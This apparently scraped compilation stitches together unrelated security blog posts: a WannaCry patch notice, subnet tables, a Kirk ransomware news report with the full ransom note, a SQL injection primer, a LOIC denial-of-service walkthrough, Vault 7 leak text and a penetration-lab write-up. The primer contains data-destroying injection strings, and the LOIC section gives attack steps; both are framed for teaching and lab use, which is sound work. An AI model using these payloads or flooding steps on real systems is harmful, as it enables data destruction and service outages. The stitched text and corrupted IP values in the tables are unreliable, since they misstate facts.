I woke up on the 12th of May, it was my birthday, and I looked on the news feed and saw a burst of articles regarding the WannaCry Ransomware that has swept across the globe.
In the last few days, a new type of malware called Wannacrypt has done worldwide damage. It combines the characteristics of ransomware and a worm and has hit a lot of machines around the world from different enterprises or government organizations:
While everyone’s attention related to this attack has been on the vulnerabilities in Microsoft Windows XP, please pay attention to the following:
The attack works on all versions of Windows if they haven’t been patched since the March patch release!
The malware can only exploit those vulnerabilities it first has to get on the network. There are reports it is being spread via email phishing or malicious web sites, but these reports remain uncertain.
Please take the following actions immediately:
Make sure all systems on your network are fully patched, particularly servers.
As a precaution, please ask all colleagues at your location to be very careful about opening email attachments and minimise browsing the web while this attack is on-going.
The vulnerabilities are fixed by the below security patches from Microsoft which was released in Mar of 2017, please ensure you have patched your systems:
This video explains how the RSA public key and private key are created to be fully dependent on each other. The first part of the video explains the concepts with paint and colors. The second part contains heavy duty math, which may not be as easily understood:
Watching this video may help you understand the XOR Activity in Section 3.3.
These links detail the Heartbleed bug from 2014. This vulnerability shows that even though data is protected both in transit and at rest with encryption, data that is being processed is not protected. The encrypted data needs to be decrypted before it’s processed, and therefore is vulnerable at this stage.
This is a Netmask Translation Table. It can be used to determine what IPs should be used and which ones cannot be used.
Netmask CIDR Notes
255.255.255.255 /32 Host (single address)
255.255.255.254 /31 Unusable
255.255.255.252 /30 4 IPs with 2 Usable
255.255.255.248 /29 8 IPs with 6 Usable
255.255.255.240 /28 16 IPs with 14 Usable
255.255.255.224 /27 32 IPs with 30 Usable
255.255.255.192 /26 64 IPs with 62 Usable
255.255.255.128 /25 128 IPs with 126 Usable
255.255.255.0 /24 256 IPs with 254 Usable "Class C"
Note: The first and last IP of a series are NOT usable and the first
usable IP is normally set up for the router.
The 1st IP is the network address. The last IP is the broadcast address.
Each customer will be given their own unique IP block necessary to configure their own network. This unique IP information will be supplied by their Account Manager.
The below is only an EXAMPLE, do NOT use its IPs, instead, use those IP numbers that come from your Account Manager.
Your Account Manager should give you all the following information.
Your IP block is 188.8.131.52/28
Gateway IP address (Router IP) 184.108.40.206
Useable IP's 220.127.116.11-46
Subnet Mask 255.255.255.240
DNS Servers: ns.cais.com 18.104.22.168
Subnetmask Translation Table
This is a Netmask Translation Table. It can be used to determine what IPs should be used and which ones cannot be used.
Subnetmask Subnetmask (binary) CIDR Notes
255.255.255.255 11111111.11111111.11111111.11111111 /32 Host (single address)
255.255.255.254 11111111.11111111.11111111.11111110 /31 Unusable
255.255.255.252 11111111.11111111.11111111.11111100 /30 4 IPs with 2 Usable
255.255.255.248 11111111.11111111.11111111.11111000 /29 8 IPs with 6 Usable
255.255.255.240 11111111.11111111.11111111.11110000 /28 16 IPs with 14 Usable
255.255.255.224 11111111.11111111.11111111.11100000 /27 32 IPs with 30 Usable
255.255.255.192 11111111.11111111.11111111.11000000 /26 64 IPs with 62 Usable
255.255.255.128 11111111.11111111.11111111.10000000 /25 128 IPs with 126 Usable
255.255.255.0 11111111.11111111.11111111.00000000 /24 256 IPs with 254 Usable
255.255.254.0 11111111.11111111.11111110.00000000 /23
255.255.252.0 11111111.11111111.11111100.00000000 /22
255.255.248.0 11111111.11111111.11111000.00000000 /21
255.255.240.0 11111111.11111111.11110000.00000000 /20
255.255.224.0 11111111.11111111.11100000.00000000 /19
255.255.192.0 11111111.11111111.11000000.00000000 /18
255.255.128.0 11111111.11111111.10000000.00000000 /17
255.255.0.0 11111111.11111111.00000000.00000000 /16
255.254.0.0 11111111.11111110.00000000.00000000 /15
255.252.0.0 11111111.11111100.00000000.00000000 /14
255.248.0.0 11111111.11111000.00000000.00000000 /13
255.240.0.0 11111111.11110000.00000000.00000000 /12
255.224.0.0 11111111.11100000.00000000.00000000 /11
255.192.0.0 11111111.11000000.00000000.00000000 /10
255.128.0.0 11111111.10000000.00000000.00000000 /9
255.0.0.0 11111111.00000000.00000000.00000000 /8
254.0.0.0 11111110.00000000.00000000.00000000 /7
252.0.0.0 11111100.00000000.00000000.00000000 /6
248.0.0.0 11111000.00000000.00000000.00000000 /5
240.0.0.0 11110000.00000000.00000000.00000000 /4
22.214.171.124 11100000.00000000.00000000.00000000 /3
192.0.0.0 11000000.00000000.00000000.00000000 /2
126.96.36.199 10000000.00000000.00000000.00000000 /1
0.0.0.0 00000000.00000000.00000000.00000000 /0
IP spaceNote: The first and last IP of a series are NOT usable and the first
usable IP is normally set up for the router.
The 1st IP is the network address. The last IP is the broadcast address.
Boldly going where no man has gone before, the Kirk Ransomware brings so much nerdy goodness to the table that it could make anyone in IT interested. We have Star Trek, Low Orbital Ion Cannons, a cryptocurrency payment other than Bitcoin, and a decryptor named Spock! Need I say more?
Discovered today by Avast malware researcher Jakub Kroustek, the Kirk Ransomware is written in Python and may be the first ransomware to utilize Monero as the ransom payment of choice.
At this time there are no known victims of this ransomware and it does not appear to be decryptable. For those who want to discuss this ransomware or receive updates about it, they can subscribe to our Kirk Ransomware Support & Help topic.
Kirk Ransomware uses Monero for Ransom Payments
Ever since Monero was released, it has been highly touted as a more secure and anonymous payment system than Bitcoin. This has caused underground criminal sites, like AlphaBay, to accept it as payment and for criminals to mine it using mining Trojans. It was only a matter of time until ransomware developers started requesting it.
For possibly the first time, with the release of Kirk Ransomware, Monero has been introduced as a ransom payment. The problem is that this is only going to confuse victims even more. Even with Bitcoin becoming more accepted, it is still not easy to acquire them. By introducing a new cryptocurrency into the mix, victims are just going to become more confused and make paying ransoms even more difficult.
How the Kirk Ransomware Encrypts a Computer
While it is not currently known how the Kirk Ransomware is being distributed, we do know that it is masquerading as the network stress tool called Low Orbital Ion Cannon. Currently named loic_win32.exe, when executed Kirk Ransomware will now generate a AES password that will be used to encrypt a victim’s files. This AES key will then be encrypted by an embedded RSA-4096 public encryption key and saved in the file called pwd in the same directory as the ransomware executable.
If you plan on paying the ransom for the Kirk Ransomware, you must not delete the pwd file as it contains an encrypted version of your decryption key. Only the ransomware developer can decrypt this file and if a victim wishes to pay the ransom they will be required to send them this file.
Below is the current embedded RSA key used to encrypt the victim’s encryption key.
-----BEGIN PUBLIC KEY-----
-----END PUBLIC KEY-----
Kirk Ransomware will now display a message box that displays the same slogan as the LOIC network stress tool. This slogan is: “Low Orbital Ion Cannon | When harpoons, air strikes and nukes fail | v188.8.131.52”.
At this point, the ransomware infection will begin to scan the C: drive for files that have certain file extensions. At the time of this writing, Kirk Ransomware targets 625 file types, which are listed at the end of the article.
If a matching file is detected, it will encrypt it using the previously created AES encryption key and then append the .kirked extension to the encrypted file’s name. For example, a file called test.jpg would be encrypted and renamed to test.jpg.kirked.
When the ransomware finishes encrypting the files it will drop a ransom note called RANSOM_NOTE.txt in the same folder as the executable. It will also display the ransom note in a Window on your desktop. A full version of the ransom note can be see at the end of the article.
This ransom note tells the victim that they must purchase ~1,100 worth of the Monero currency and send it to the enclosed Monero address. Once a payment is made, the victim must email the pwd file and the payment transaction ID to the email@example.com or firstname.lastname@example.org email addresses to receive the decryptor.
The Spock Decryptor
This wouldn’t be a Star Trek themed ransomware without Spock. The developer agrees as they have named the decryptor “Spock” and it will be supplied to the victim once a a payment is made.
At this time we have not seen a sample of the decryptor, so cannot provide more info regarding it.
As previously said, unfortunately at this time the ransomware does not look like it can be decrypted. For those who want to discuss this ransomware or receive updates about it, they can subscribe to our Kirk Ransomware Support & Help topic.
oWMKxd, .,lxNKKOo;. :xWXklcc;. ...'.
k lMMNl . ON. :c. ''. ':....
.WXc ;WMMMXNNXKKxdXMM. . .
.NdoK: XMMMMMMMMMMMMMMM;oo; ...;,cxxxll. .
KK:xKKWMMMXNMMMMW; .. :WNKd, .. .'cdOXKXNNNNNWWMMMMMMMW0,
lNMXXMMMMMMMMWWMMWKk, ;0k' .,cxxk0K0O0XXWWMMMMMMMMMMMMMMX:.. ..
..,;XMMMMMMMWXWWK0KK: .;. .:lddddxOOO0XWMMMMMMMMMMMMMMMMMMO. .,
.kKXMMMMMWkoxolcc;.. .':loodxO00OO0NNXNWMMMMMMMMMMMMMMMN; '.
.MK;kWMMMWWKOc. . ..';cdxkKNX0kOOOKNMMMMMMMMMMMMMMMMMW: .
,MW:,:x0NMMMMWW0x' ..,:dXNWW0xkkKWMMMMMMMMMMMMMMMMMMWk. ..
oMMN; ;odoccc;c:. ...lXWWMOok0NMMMMMWNXKXKXWMMMMMMMOc.
XMMMX, ....';lldkWkodK0loc'. .'lxx0kOKNMMMXo.
'XMMMMMNc .dldXWx. ..,,coOXOkXMMMK,
,. .:dk0KNWMk. ... .kWMK,. ..:c .:.. .0MWMMMMO.
.':x0K0:. .. . . .OWMNNXO:cccdxKXWMW0o0WWMMMM;.
00000000000kdl:,'. ..'o00l 'KMMNKNWWNKXWWMMMMMMMMMMMMMM0.
0000000000000000000Oxl:' .;xKWWx .xNMMMWNMMMMMMMMMMMMMMMMMMMMMMl
0000000000000000000000000x;. ..,::,. .ck0KKk' '0WMMMMMMMWWMMMMMMMMMMMMMMMMMM0. .'
0000000000000000000000000000Oxdllc:;,....,'... .cdkOko: ,cOKKXWMMMKd0WMMMMMMMMMMMMMWW0. 'Kc:,
000000000000000000000000000000000OkkkxdoodxOkoooool .;okOx, .,'...cKMXl'oKWMMMMMMMWWNXN0 'MMc0.
0000OO000000000000000000000000000000000000000kc. .:dk0c ,KNKxdKMMM0;;kMMMMMMMMWNKXO ,kW0xl
OdloxO000000000000000000000000000000000000000000x, .,ll; .lokKWMMMMMMMMM0xNMMMMMMMNXXNo.xK;cXKx
lx000000000000000000000000000000000000000000000000l .'.. .'cKWXOXMMMMMMMMMMMMMMMMMWWNXXNKX0MNkNK0..
00000000000000000000000000000000000000000000000000O .. ..,;ok0X000KKXWMNNMMMMMMMMNNXKKXX00MMMWWc',
00000000000000000000000000000000000000000000000000d .. ..........;;.cKMMMMMWNXKKXNKxkNMMX,
:;ok00000000000000000000000000000000000O.;.d00000dc ... .........cONMMMMMMMMMNXXXN0dlddxN.
.dk000000000000000000000000000000000000;ld,.O00kocc .. ...,;::lokKNMMMMMMMMWKOO0OxloocxM:
OO0000000000000000000000000000000000000ol0Koc0xc:ll . ..;lxO0XNNMMMMMMMMMMMN0xoxOdl::,;0Md
:;,'..;loxk000000000000000000000000000000000lx..loo ,0 .'';lkKKNMMMMMMMMMNOd:;lc:;'..,kWMK
cccldxkkkO00Okdooddxk00000000000000000000000Oc'lddl dK, .':ollokOOOOOOOc'.........lXMMMM,
000000kdoc,....;cldkO0000000000000000000000Okdodddo'K0'. ....... .oKMMMMMM0
_ _____ ____ _ __ ____ _ _ _ ____ ___ __ ____ ___ ____ _____
| |/ /_ _| _ \| |/ / | _ \ / \ | \ | / ___| / _ \| \/ \ \ / / \ | _ \| ____|
| ' / | || |_) | ' / | |_) | / _ \ | \| \___ \| | | | |\/| |\ \ /\ / / _ \ | |_) | _|
| . \ | || _ <| . \ | _ < / ___ \| |\ |___) | |_| | | | | \ V V / ___ \| _ <| |___
|_|\_\___|_| \_\_|\_\ |_| \_\/_/ \_\_| \_|____/ \___/|_| |_| \_/\_/_/ \_\_| \_\_____|
Oh no! The Kirk ransomware has encrypted your files!
> ! IMPORTANT ! READ CAREFULLY:
Your computer has fallen victim to the Kirk malware and important files have been encrypted - locked
up so they don't work. This may have broken some software, including games, office suites etc.
Here's a list of some the file extensions that were targetted:
.3g2 .rar .jar .cgi .class .jtd .potx .xex .dds
.3gp .jpg .csv .pl .cd .jtt .potm .tiger .ff
.asf .jpeg .psd .com .java .hwp .sda .lbf .yrp
.asx .png .wav .wsf .swift .602 .sdd .cab .pck
.avi .tiff .ogg .bmp .vb .pdb .sdp .rx3 .t3
.flv .zip .wma .bmp .ods .psw .cgm .epk .ltx
.ai .7z .aif .gif .xlr .xlw .wotreplay.vol .uasset
.m2ts .dif.z .mpa .tif .xls .xlt .rofl .asset .bikey
.mkv .exe .wpl .tiff .xlsx .xlsm .pak .forge .patch
.mov .tar.gz .arj .htm .dot .xltx .big .lng .upk
.mp4 .tar .deb .js .docm .xltm .bik .sii .uax
.mpg .mp3 .pkg .jsp .dotx .xlsb .xtbl .litemod .mdl
.mpeg .sh .db .php .dotm .wk1 .unity3d .vef .lvl
mpeg4 .c .dbf .xhtml .wpd .wks .capx .dat .qst
.rm .cpp .sav .cfm .wps .123 .ttarch .papa .ddv
.swf .h .xml .rss .rtf .sdc .iwi .psark .pta
.vob .mov .html .key .sdw .slk .rgss3a .ydk
.wmv .gif .aiml .odp .sgl .pxl .gblorb .mpq
.doc .txt .apk .pps .vor .wb2 .xwm .wtf
.docx .py .bat .ppt .uot .pot .j2e .bsa
.pdf .pyc .bin .pptx .uof .pptm .mpk .re4
There are an additional 441 file extensions that are targetted. They are mostly to do with games.
To get your files back, you need to pay. Now. Payments recieved more than 48 hours after the time of
infection will be charged double. Further time penalties are listed below. The time of infection has
Any files with the extensions listed above will now have the extra extension '.kirked', these files
are encrypted using military grade encryption.
In the place you ran this program from, you should find a note (named RANSOM_NOTE.txt) similar to this one.
You will also find a file named 'pwd' - this is your encrypted password file. Although it was
generated by your computer, you have no way of ever decrypting it. This is due to the security
of both the way it was generated and the way it was encrypted. Your files were encrypted using
____ ____ ___ ____ _ __ _____ ___ _____ _ _ _____ ____ _____ ____ ____ _ _ _____ _
/ ___|| _ \ / _ \ / ___| |/ / |_ _/ _ \ |_ _| | | | ____| | _ \| ____/ ___| / ___| | | | ____| |
\___ \| |_) | | | | | | ' / | || | | | | | | |_| | _| | |_) | _| \___ \| | | | | | _| | |
___) | __/| |_| | |___| . \ | || |_| | | | | _ | |___ | _ <| |___ ___) | |___| |_| | |___|_|
|____/|_| \___/ \____|_|\_\ |_| \___/ |_| |_| |_|_____| |_| \_\_____|____/ \____|\___/|_____(_)
"Logic, motherfucker." ~ Spock.
Decrypting your files is easy. Take a deep breath and follow the steps below.
1 ) Make the proper payment.
Payments are made in Monero. This is a crypto-currency, like bitcoin.
You can buy Monero, and send it, from the same places you can any other
crypto-currency. If you're still unsure, google 'bitcoin exchange'.
Sign up at one of these exchange sites and send the payment to the address below.
Make note of the payment / transaction ID, or make one up if you have the option.
Payment Address (Monero Wallet):
Days : Monero : Offer Expires
0-2 : 50 : 03/18/17 15:32:14
3-7 : 100 : 03/23/17 15:32:14
8-14 : 200 : 03/30/17 15:32:14
15-30 : 500 : 04/15/17 15:32:14
Note: In 31 days your password decryption key gets permanently deleted.
You then have no way to ever retrieve your files. So pay now.
2 ) Email us.
Send your pwd file as an email attachment to one of the email addresses below.
Include the payment ID from step 1.
Active email addresses:
3 ) Decrypt your files.
You will recieve your decrypted password file and a program called 'Spock'.
Download these both to the same place and run Spock.
Spock reads in your decrypted password file and uses it to decrypt all of the
affected files on your computer.
> IMPORTANT !
The password is unique to this infection.
Using an old password or one from another machine will result in corrupted files.
Corrupted files cannot be retrieved.
Don't fuck around.
4 ) Breathe.
_ _____ _______ _ ___ _ _ ____
| | |_ _\ \ / / ____| | | / _ \| \ | |/ ___|
| | | | \ \ / /| _| | | | | | | \| | | _
| |___ | | \ V / | |___ | |__| |_| | |\ | |_| |
|_____|___| \_/ |_____| |_____\___/|_| \_|\____|
_ _ _ ____ ____ ____ ___ ____ ____ _____ ____
/ \ | \ | | _ \ | _ \| _ \ / _ \/ ___|| _ \| ____| _ \
/ _ \ | \| | | | | | |_) | |_) | | | \___ \| |_) | _| | |_) |
/ ___ \| |\ | |_| | | __/| _ <| |_| |___) | __/| |___| _ <
/_/ \_\_| \_|____/ |_| |_| \_\\___/|____/|_| |_____|_| \_\
In my previous post “Pentestit Lab v10 – The Mail Token”, we attained usernames through Intelligence Gathering, brute forced the SMTP Service, attained login credentials, and scored our first token. Today we will take our first steps at compromising the Global Data Security website – which will include the following:
SQL injection has been around for at least 20 years, but it is no less powerful or dangerous than any other attack we have covered so far. It is designed to exploit flaws in a website or web application. The attack works by inserting code into an existing line of code prior to its being executed by a database. If SQL injection is successful, attackers can cause their own code to run. In the real world this attack has proven dangerous because many developers are either not aware of the threat or don’t understand its seriousness. Developers should be aware that:
SQL injection is typically a result of flaws in the web application or website and is not an issue with the database.
SQL injection is at the source of many of the high-level or well-known attacks on the Internet.
The goal of attacks of this type is to submit commands through a web application to a database in order to retrieve or manipulate data. • The usual cause of this type of flaw is improper or absent input validation, thus allowing code to pass unimpeded to the database without being verified.
SQL Attacks in Action
In 2011, Sony Corporation was the victim of a SQL injection that compromised a multitude of accounts (estimated to be over one million e-mails, usernames, and passwords). The FBI revealed that a minimum of 100,000 records, including Social Security numbers of current and former federal employees, were compromised. Additionally, 2,800 of the records obtained included bank account numbers. When investigating this attack, the FBI revealed that not only the DoE and the Army were impacted; NASA, the U.S. Missile Defense Agency, and the Environmental Protection Agency were also affected. Details of these attacks have not been fully released as of this writing. SQL injection is achieved through the insertion of characters into existing SQL commands with the intention of altering the intended behavior. The following example illustrates SQL injection in action and how it is carried out. The example also reveals the impact of altering the existing values and structure of a SQL query.
In the following example, an attacker with the username link inputs for the original code after the = sign in WHERE owner which used to include the string ‘name’; DELETE FROM items; — for itemName into an existing SQL command, and the query becomes the following two queries:
SELECT * FROM items
WHERE owner = 'link'
AND itemname = 'name';
DELETE FROM items;--
Many of the common database products such as Microsoft’s SQL Server and Oracle’s Siebel allow several SQL statements separated by semicolons to be executed at once. This technique, known as batch execution, allows an attacker to execute multiple arbitrary commands against a database. In other databases, this technique will generate an error and fail, so knowing the database you are attacking is essential.
If an attacker enters the string ‘name’; DELETE FROM items; SELECT * FROM items WHERE ‘a’ = ‘a’, the following three valid statements will be created:
SELECT * FROM items
WHERE owner = 'link'
AND itemname = 'name';
DELETE FROM items;
SELECT * FROM items WHERE 'a' = 'a';
A good way to prevent SQL injection attacks is to use input validation, which ensures that only approved characters are accepted. Use whitelists, which dictate safe characters, and blacklists, which dictate unsafe characters.
Results of SQL Injection
What can be accomplished as a result of a SQL injection attack? Well, there are a huge number of possibilities, which are limited only by the configuration of the system and the skill of the attacker.
If an attack is successful, a host of problems could result. Consider the following a sample of the potential outcomes:
Identity spoofing through manipulating databases to insert bogus or misleading information such as e-mails and contact information.
Alteration of prices in e-commerce applications. In this attack, the intruder once again alters data, but does so with the intention of changing price information in order to purchase products or services at a reduced rate.
Alteration of data or outright replacement of data in existing databases with information created by the attacker.
Escalation of privileges to increase the level of access an attacker has to the system, up to and including full administrative access to the operating system.
Denial of service, performed by flooding the server with requests designed to overwhelm the system.
Data extraction and disclosure of all data on the system through the manipulation of the database.
Destruction or corruption of data through rewriting, altering, or other means.
Eliminating or altering transactions that have been or will be committed
Next up will be all about the anatomy of a SQL Injection and Database vulnerabilities.
Low Orbit Ion Cannon (LOIC) is one the easiest DDoS tools available, yet its simplicity and remote connection features make it an extremely effective tool. In this guide I will show you just how easy it is to launch a DoS attack using LOIC. For this exercise I used a Windows Server 2008 client with LOIC installed and a Windows 7 target with Wireshark for traffic capture.
1. First, we run the LOIC.exe file. Do not perform an in-depth installation; just run the executable.
2. Once you run the EXE, the program pops up and is ready for a quick configuration. Note that you can target a URL as well as a specific IP address. For our purposes just enter the IP of your Windows 7 box.
3. Click the Lock On button. The IP address shows up as the target; there is no doubt where this traffic is going.
4. Now that you have the IP input and target selected, you can configure a few more details for your attack preferences. For this exercise use port 80, the TCP method, 10000 threads, and the default TCP/UDP message, as shown here:
5. Before you hit the fire button, hop back over to your Windows 7 system and start Wireshark to see the traffic generated by LOIC.
6. Now you can fire your LOIC beam and view the traffic.
CIA malware and hacking tools are built by EDG (Engineering Development Group), a software development group within CCI (Center for Cyber Intelligence), a department belonging to the CIA’s DDI (Directorate for Digital Innovation). The DDI is one of the five major directorates of the CIA (see this organizational chart of the CIA for more details).
The EDG is responsible for the development, testing and operational support of all backdoors, exploits, malicious payloads, trojans, viruses and any other kind of malware used by the CIA in its covert operations world-wide.
The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell’s 1984, but “Weeping Angel”, developed by the CIA’s Embedded Devices Branch (EDB), which infests smart TVs, transforming them into covert microphones, is surely its most emblematic realization.
The attack against Samsung smart TVs was developed in cooperation with the United Kingdom’s MI5/BTSS. After infestation, Weeping Angel places the target TV in a ‘Fake-Off’ mode, so that the owner falsely believes the TV is off when it is on. In ‘Fake-Off’ mode the TV operates as a bug, recording conversations in the room and sending them over the Internet to a covert CIA server.
Despite iPhone’s minority share (14.5%) of the global smart phone market in 2016, a specialized unit in the CIA’s Mobile Development Branch produces malware to infest, control and exfiltrate data from iPhones and other Apple products running iOS, such as iPads. CIA’s arsenal includes numerous local and remote “zero days” developed by CIA or obtained from GCHQ, NSA, FBI or purchased from cyber arms contractors such as Baitshop. The disproportionate focus on iOS may be explained by the popularity of the iPhone among social, political, diplomatic and business elites.
These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Wiebo, Confide and Cloackman by hacking the “smart” phones that they run on and collecting audio and message traffic before encryption is applied.
Many of these infection efforts are pulled together by the CIA’s Automated Implant Branch (AIB), which has developed several attack systems for automated infestation and control of CIA malware, such as “Assassin” and “Medusa”.
The CIA has developed automated multi-platform malware attack and control systems covering Windows, Mac OS X, Solaris, Linux and more, such as EDB’s “HIVE” and the related “Cutthroat” and “Swindle” tools, which are described in the examples section below.
CIA ‘hoarded’ vulnerabilities (“zero days”)
In the wake of Edward Snowden’s leaks about the NSA, the U.S. technology industry secured a commitment from the Obama administration that the executive would disclose on an ongoing basis — rather than hoard — serious vulnerabilities, exploits, bugs or “zero days” to Apple, Google, Microsoft, and other US-based manufacturers.
Serious vulnerabilities not disclosed to the manufacturers places huge swathes of the population and critical infrastructure at risk to foreign intelligence or cyber criminals who independently discover or hear rumors of the vulnerability. If the CIA can discover such vulnerabilities so can others.
The U.S. government’s commitment to the Vulnerabilities Equities Process came after significant lobbying by US technology companies, who risk losing their share of the global market over real and perceived hidden vulnerabilities. The government stated that it would disclose all pervasive vulnerabilities discovered after 2010 on an ongoing basis.
“Year Zero” documents show that the CIA breached the Obama administration’s commitments. Many of the vulnerabilities used in the CIA’s cyber arsenal are pervasive and some may already have been found by rival intelligence agencies or cyber criminals.
As an example, specific CIA malware revealed in “Year Zero” is able to penetrate, infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts. The CIA attacks this software by using undisclosed security vulnerabilities (“zero days”) possessed by the CIA but if the CIA can hack these phones then so can everyone else who has obtained or discovered the vulnerability. As long as the CIA keeps these vulnerabilities concealed from Apple and Google (who make the phones) they will not be fixed, and the phones will remain hackable.
The same vulnerabilities exist for the population at large, including the U.S. Cabinet, Congress, top CEOs, system administrators, security officers and engineers. By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone &mdsh; at the expense of leaving everyone hackable.
‘Cyberwar’ programs are a serious proliferation risk
Cyber ‘weapons’ are not possible to keep under effective control.
While nuclear proliferation has been restrained by the enormous costs and visible infrastructure involved in assembling enough fissile material to produce a critical nuclear mass, cyber ‘weapons’, once developed, are very hard to retain.
Cyber ‘weapons’ are in fact just computer programs which can be pirated like any other. Since they are entirely comprised of information they can be copied quickly with no marginal cost.
Securing such ‘weapons’ is particularly difficult since the same people who develop and use them have the skills to exfiltrate copies without leaving traces — sometimes by using the very same ‘weapons’ against the organizations that contain them. There are substantial price incentives for government hackers and consultants to obtain copies since there is a global “vulnerability market” that will pay hundreds of thousands to millions of dollars for copies of such ‘weapons’. Similarly, contractors and companies who obtain such ‘weapons’ sometimes use them for their own purposes, obtaining advantage over their competitors in selling ‘hacking’ services.
Over the last three years the United States intelligence sector, which consists of government agencies such as the CIA and NSA and their contractors, such as Booz Allan Hamilton, has been subject to unprecedented series of data exfiltrations by its own workers.
A number of intelligence community members not yet publicly named have been arrested or subject to federal criminal investigations in separate incidents.
Most visibly, on February 8, 2017 a U.S. federal grand jury indicted Harold T. Martin III with 20 counts of mishandling classified information. The Department of Justice alleged that it seized some 50,000 gigabytes of information from Harold T. Martin III that he had obtained from classified programs at NSA and CIA, including the source code for numerous hacking tools.
Once a single cyber ‘weapon’ is ‘loose’ it can spread around the world in seconds, to be used by peer states, cyber mafia and teenage hackers alike.
U.S. Consulate in Frankfurt is a covert CIA hacker base
In addition to its operations in Langley, Virginia the CIA also uses the U.S. consulate in Frankfurt as a covert base for its hackers covering Europe, the Middle East and Africa.
CIA hackers operating out of the Frankfurt consulate ( “Center for Cyber Intelligence Europe” or CCIE) are given diplomatic (“black”) passports and State Department cover. The instructions for incoming CIA hackers make Germany’s counter-intelligence efforts appear inconsequential: “Breeze through German Customs because you have your cover-for-action story down pat, and all they did was stamp your passport”
Your Cover Story (for this trip) Q: Why are you here? A: Supporting technical consultations at the Consulate.
Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Shengen open border area — including France, Italy and Switzerland.
A number of the CIA’s electronic attack methods are designed for physical proximity. These attack methods are able to penetrate high security networks that are disconnected from the internet, such as police record database. In these cases, a CIA officer, agent or allied intelligence officer acting under instructions, physically infiltrates the targeted workplace. The attacker is provided with a USB containing malware developed for the CIA for this purpose, which is inserted into the targeted computer. The attacker then infects and exfiltrates data to removable media. For example, the CIA attack system Fine Dining, provides 24 decoy applications for CIA spies to use. To witnesses, the spy appears to be running a program showing videos (e.g VLC), presenting slides (Prezi), playing a computer game (Breakout2, 2048) or even running a fake virus scanner (Kaspersky, McAfee, Sophos). But while the decoy application is on the screen, the underlaying system is automatically infected and ransacked.
How the CIA dramatically increased proliferation risks
In what is surely one of the most astounding intelligence own goals in living memory, the CIA structured its classification regime such that for the most market valuable part of “Vault 7” — the CIA’s weaponized malware (implants + zero days), Listening Posts (LP), and Command and Control (C2) systems — the agency has little legal recourse.
The CIA made these systems unclassified.
Why the CIA chose to make its cyberarsenal unclassified reveals how concepts developed for military use do not easily crossover to the ‘battlefield’ of cyber ‘war’.
To attack its targets, the CIA usually requires that its implants communicate with their control programs over the internet. If CIA implants, Command & Control and Listening Post software were classified, then CIA officers could be prosecuted or dismissed for violating rules that prohibit placing classified information onto the Internet. Consequently the CIA has secretly made most of its cyber spying/war code unclassified. The U.S. government is not able to assert copyright either, due to restrictions in the U.S. Constitution. This means that cyber ‘arms’ manufactures and computer hackers can freely “pirate” these ‘weapons’ if they are obtained. The CIA has primarily had to rely on obfuscation to protect its malware secrets.
Conventional weapons such as missiles may be fired at the enemy (i.e into an unsecured area). Proximity to or impact with the target detonates the ordnance including its classified parts. Hence military personnel do not violate classification rules by firing ordnance with classified parts. Ordnance will likely explode. If it does not, that is not the operator’s intent.
Over the last decade U.S. hacking operations have been increasingly dressed up in military jargon to tap into Department of Defense funding streams. For instance, attempted “malware injections” (commercial jargon) or “implant drops” (NSA jargon) are being called “fires” as if a weapon was being fired. However the analogy is questionable.
Unlike bullets, bombs or missiles, most CIA malware is designed to live for days or even years after it has reached its ‘target’. CIA malware does not “explode on impact” but rather permanently infests its target. In order to infect target’s device, copies of the malware must be placed on the target’s devices, giving physical possession of the malware to the target. To exfiltrate data back to the CIA or to await further instructions the malware must communicate with CIA Command & Control (C2) systems placed on internet connected servers. But such servers are typically not approved to hold classified information, so CIA command and control systems are also made unclassified.
A successful ‘attack’ on a target’s computer system is more like a series of complex stock maneuvers in a hostile take-over bid or the careful planting of rumors in order to gain control over an organization’s leadership rather than the firing of a weapons system. If there is a military analogy to be made, the infestation of a target is perhaps akin to the execution of a whole series of military maneuvers against the target’s territory including observation, infiltration, occupation and exploitation.
Evading forensics and anti-virus
A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple, Microsoft, Google, Samsung, Nokia, Blackberry, Siemens and anti-virus companies attribute and defend against attacks.
In my previous post “Pentestit Lab v10 – Introduction & Layout”, I covered the Network layout and VPN Connection. Today I will be covering the first steps taken to attack the lab – which will include the following:
Fingerprinting the GW machine
Carrying out Intelligence Gathering
Brute Forcing SMTP
Finding the Mail Token
There are 13 Tokens in total scattered throughout the lab (Network). Each of the posts are in order of compromise which provided the best results and were the most logical. I closely followed the The Penetration Testing Execution Standard which aided me in compromising the next system or device from previously gained information.
What does this mean? This means that I started by enumerating users, gaining emails, passwords, and any other network information that seemed useful to me. With this information I was able to log into other devices, leverage exploits or logins further in the process, this also allowed me to easily pivot from machine to machine and gain deeper access to the network – to where I was finally able to take control of the Domain Controller.
If you are completely unfamiliar with how a “Grey Box” Penetration Test is carried out on a Network – along with the exploitation of Web Applications, daemons and services – then I highly suggest you get ahold of and read the following resources – as well as read the PTES Standards that I linked above.
As with anything, if you have any comments, questions, or general concerns/issues/suggestions about my techniques – please leave a comment below!
Fingerprinting the GW Machine:
Consult the Network Map if you forgot what or where the GW Machine is. Since it’s the only Server sitting between us (possibly in the DMZ) and the internal network, we have to compromise it first to gain access to the internal network.
Since we already have VPN access to the lab – we can start by fingerprinting the gw machine (also called Active Footprinting in the PTES).
We can do so by running Nmap as a SYN Stealth Scan with the -sS option, as well as running the -A option for OS detection, version detection, script scanning, and traceroute. I also used the -n option to disable DNS Resolution.
If you are unfamiliar with the Nmap scan options, or need a quick refresher – then I suggest you read the Nmap Options Summary.
eb7u6 (protocol 2.0)
| 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
| 2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
|_ 256 2c:58:fd:06:ea:46:8e:f7:b5:28:58:58:06:fa:dc:38 (ECDSA)
25/tcp open smtp CommuniGate Pro mail server 6.0.9
|_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection timeout
80/tcp open http nginx 1.10.1
|_http-title: 403 Forbidden
443/tcp open http nginx 1.2.1
|_http-title: Security Blog by GlobalDataSecurity
8100/tcp open http CommuniGate Pro httpd 6.0.9
